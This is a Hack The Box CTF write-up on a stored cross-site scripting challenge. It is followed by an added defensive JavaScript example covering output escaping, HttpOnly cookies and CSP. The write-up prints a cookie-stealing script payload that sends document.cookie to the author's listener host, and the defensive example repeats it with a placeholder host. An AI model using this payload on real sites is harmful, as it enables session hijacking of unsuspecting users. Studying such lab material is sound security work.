Monday, December 6, 2021

Hack The Box Cyber Santa CTF - Web Day 1 - Toy Workshop Writeup

 

Challenge Files - Local Docker Web Server:  web_toy_workshop.zip

Exploit Technique Used:  XSS - Cross Site Scripting

Details:

When you surf to the webserver, you see a colorful animation of Santa's Toyshop at work converting recyclables into nicely wrapped presents.  So that's what happens to my soda cans!


After carefully analyzing the included local Docker web files and webserver source code, it took me an embarrassingly long time to figure out you can click on the elves' heads to bring up this prompt:


This is a clue that the manager will be checking whatever messages we send him/her, so this immediately brings to mind a cookie-stealing, cross-site scripting type of attack.  Therefore, I created a Netcat listener on my public Amazon Ubuntu server and attempted to steal the manager's cookie by sending him/her this:

<script>new Image().src = "http://<my_ip>:17777/"+encodeURI(document.cookie);</script>

No more than two minutes later, I was greeted with the flag, in which %7B stands for '{' and %7D stands for '}':


HTB{3v1l_3lv3s_4r3_r1s1ng_up!}
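On the defensive side, the message above worked only because the stored text was rendered as HTML in the manager's browser and the cookie was readable from script. The following is an added example, not code from the challenge or from this write-up; the function names, cookie name and sample host are assumptions. It shows output encoding of the message plus the cookie and CSP headers that close both gaps:

```javascript
// Added example (not the challenge's code): names and sample values are constructed.

// Characters that let text break out of an HTML text node or attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text so the browser displays it instead of parsing it as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical renderer for one row of the manager's message list.
function renderMessage(message) {
  return `<p class="message">${escapeHtml(message)}</p>`;
}

// Session cookie attributes: HttpOnly hides the value from document.cookie,
// Secure and SameSite narrow where the browser will send it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Content-Security-Policy as a second layer: no inline scripts, and no
// image loads to third-party hosts.
const CSP_HEADER = "default-src 'self'; script-src 'self'; img-src 'self'";

// Constructed sample: the write-up's message with a placeholder host.
const sampleMessage =
  '<script>new Image().src = "http://collector.example:17777/"+encodeURI(document.cookie);</script>';

// The stored message now reaches the page as inert text.
const rendered = renderMessage(sampleMessage);
console.log(rendered);
console.log('Set-Cookie:', sessionCookieHeader('session', 'constructed-value'));
console.log('Content-Security-Policy:', CSP_HEADER);
```

Escaping at render time is the primary fix; HttpOnly and CSP limit the damage if an unescaped sink is missed elsewhere.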


